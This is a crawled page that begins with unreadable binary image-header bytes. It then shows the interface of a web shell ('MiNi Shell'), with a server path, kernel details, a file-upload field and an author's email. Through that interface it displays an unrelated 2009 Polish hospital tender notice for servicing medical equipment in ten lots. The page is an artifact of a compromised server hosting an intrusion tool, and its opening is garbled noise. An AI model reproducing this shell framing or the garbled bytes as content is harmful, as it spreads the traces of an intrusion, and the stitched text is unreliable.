JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/109282-N-2009.html

<p class="kh_header"><b>Bełchatów: Usługi przeglądów, konserwacji oraz napraw sprzętu medycznego.</b><br>
<b>Numer ogłoszenia: 109282 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Jana Pawła II , ul. Czapliniecka 123, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358236, faks (0-44) 63 58 208.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi przeglądów, konserwacji oraz napraw sprzętu medycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi przeglądów, konserwacji oraz napraw sprzętu medycznego w  Szpitalu Wojewódzkiim im. Jana Pawła II w Bełchatowie.
Przedmiot zamówienia obejmuje:
- utrzymanie sprawności techniczno - eksploatacyjnej urządzeń medycznych znajdujących się w wyposażeniu Szpitala, wymienionych  w Załączniku nr 2 do SIWZ,
- konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia producentów  urządzeń,
- przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
- prowadzenie paszportów technicznych sprzętu medycznego,
- założenie paszportów sprzętu medycznego (w przypadku ich braku) i ich prowadzenie dla  zakupionego przez Zamawiającego sprzętu medycznego, o ile nie zostało to zastrzeżone przez  producenta,
-  prowadzenie kart naprawy urządzeń,
-  okresowe kontrole sprzętu pomiarowego (kalibracja),
- wycena aparatury medycznej oraz sporządzanie notatek o stanie urządzeń, w tym  nie nadających się  do naprawy.

Szczegółowy opis przedmiotu zamówienia określa Rozdział III i XVIII SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na wybrane pakiety  przedmiotu  zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą  ubiegać  się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 oraz nie podlegają wykluczeniu 
              z udziału w postępowaniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą
              /Dz. U. z 2007r. Nr 223, poz. 1655, ze zmianami/. 

 Opis warunków udziału w postępowaniu oraz oceny ich spełnienia:

             1.  O zamówienie  mogą  ubiegać  się Wykonawcy, którzy spełniają warunki określone  w art. 22 ust. 1 oraz nie podlegają
                    wykluczeniu z udziału w postępowaniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień
                    publicznych /Dz. U. z 2007r. Nr 223, poz. 1655, z późn. zm./, a ponadto złożą oświadczenia zgodnie z Załącznikiem nr 1 
                    do SIWZ - druk OFERTA i dokumenty wymienione w Rozdz. VI SIWZ.
             2.   Opis warunków udziału w postępowaniu:
                   1) Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu 
                         na podstawie art. 24 ustawy - Prawo zamówień publicznych
2) Wykonawca posiada odpowiednie doświadczenie w wykonaniu zamówienia (wymagane co najmniej 2 usługi)
3) Wykonawca posiada odpowiedni potencjał techniczny (dysponuje lub będzie dysponował narzędziami i urządzeniami)
4) Wykonawca posiada odpowiednie doświadczenie (dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia)
                   3.   Zamawiający dokonana oceny spełnienia warunków udziału w postępowaniu systemem: spełnia / nie spełnia (druk ZP-17), na podstawie 
          załączonych do oferty dokumentów lub oświadczeń, zgodnie z wymaganiami Zamawiającego określonymi w niniejszej specyfikacji.
          Dokumenty wymagane od Wykonawców w celu potwierdzenia spełnienia warunków udziału w postępowaniu, zgodnie z Rozporządzeniem  
          Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz 
          form, w jakich te dokumenty mogą być składane - par. 1 ust. 1 pkt 2; par. 1 ust. 2 pkt 2, 3, 5 (Dz. U. z 2006r. Nr 87, poz. 605; Dz.U. z 
          2008r. Nr 188, poz. 1155 ze zmianami)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy zobowiązani są złożyć oświadczenie w trybie art. 44 ustawy - Prawo zamówień publicznych o spełnianiu
                      warunków udziału w postępowaniu, w tym o niepodleganiu wykluczeniu z postępowania o zamówienie publiczne (patrz: 
                      druk OFERTA).  
             2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie
                      podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, wraz z ofertą
                      należy złożyć następujące dokumenty:
                      1)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli
                            odrębne  przepisy  wymagają wpisu do rejestru  lub zgłoszenia  do ewidencji działalności gospodarczej,
                             - wystawiony lub poświadczony pod względem aktualności przez uprawniony do wystawienia organ nie wcześniej 
                                 niż 6 miesięcy przed upływem terminu składania ofert;
                3.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę odpowiedniego doświadczenia, 
                      wiedzy i osób zdolnych do wykonania zamówienia, wraz z ofertą należy złożyć następujące dokumenty:
                     1) wykaz wykonanych w ciągu ostatnich 3 lat co najmniej 2 zamówień na usługi konserwacji i napraw sprzętu medycznego o łącznej 
                         wartości wykazanych zamówień  wynoszącej nie mniej niż 75% całkowitej wartości wynikającej ze złożonej oferty przetargowej, 
                         a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców 
                         oraz załączenie dokumentów otwierdzających, że zamówienia te zostały wykonane należycie (np. opinie, referencje);
                     2) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (pisemne 
                          zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzedzi i urządzeń, jeżeli w wykazie,
                          o którym  mowa wyżej, wykonawca wskaże narzędzia i urzadzenia, którymi będzie dysponował).
                     3) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć  w wykonywaniu zamówienia, 
                         z podaniem ich kwalifikacji zawodowych (posiadanych uprawnień), a także zakresu wykonywanych przez nich czynności (pisemne 
                         zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli  w wykazie,  o który mowa 
                         wyżej wykonawca wskazał osoby, którymi będzie dysponował);
-  do wykazu Wykonawca załącza kserokopie (potwierdzone za zgodność  z oryginałem) uprawnień i kwalifikacji zawodowych osób, 
   które będą świadczyć usługi konserwacji i napraw sprzętu medycznego:
                        a)  uprawnienia specjalistów wykonujących przedmiotowe usługi
           - E - dla osób konserwujących i naprawiających aparaturę i sprzęt medyczny,
            - D - dla osób kierujących i dozorujących pracę;
                       b) uprawnienia specjalistów przeszkolonych w zakresie urządzeń medycznych pod  nadzorem Dozoru Technicznego 
                           (jeżeli dotyczy oferowanego zakresu usług);
                       c) świadectwo kwalifikacji dla specjalistów przeszkolonych w zakresie wykonywanych napraw.
                 4.    Oferta, załączniki i inne wymagane procedurą dokumenty: 
                       1)   druk OFERTA /wg załączonego wzoru druku - Załącznik nr 1 do SIWZ/;
                       2)   Formularz cenowy /wg załączonego wzoru druku - Załącznik nr 2 do SIWZ/;
                       3)   pełnomocnictwo(-a) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania 
                             Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - udzielone osobom nie wymienionym 
                             w dokumencie, o którym mowa w rozdziale VI pkt 2 ppkt 1), a reprezentującym Wykonawcę, w szczególności poprzez  
                             podpisywanie / poświadczanie dokumentów składających się na ofertę oraz innych dokumentów składanych w toku 
                             postępowania.
                 5.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, 
                      o których mowa w pkt. 2 ppkt 1 składa dokument, wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
                      potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
          6.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, 
               o którym mowa w pkt 5 zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
               sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby
               lub kraju, w którym Wykonawca  ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji po naprawie - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-belchatow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie 97-400 Bełchatów, 
            ul. Czapliniecka 123 - w Sekcji Zamówień Publicznych (pok. nr 92).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 11:00, miejsce: Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie 97-400 Bełchatów, 
            ul. Czapliniecka 123 - w sekretariacie Z-cy Dyrektora ds. Ekonomicznych (pok. nr 18),.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja aparatów RTG z wyposażeniem.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja aparatów USG z wyposażeniem.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja aparatów do znieczuleń.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja cieplarek noworodkowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja defibrylatorów wraz z zasilaczami.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja pomp infuzyjnych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja EEG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja aparatów EKG/ Holter ciśnieniowy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja sprzętu laboratoryjnego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja sztucznych nerek.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji po naprawie - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com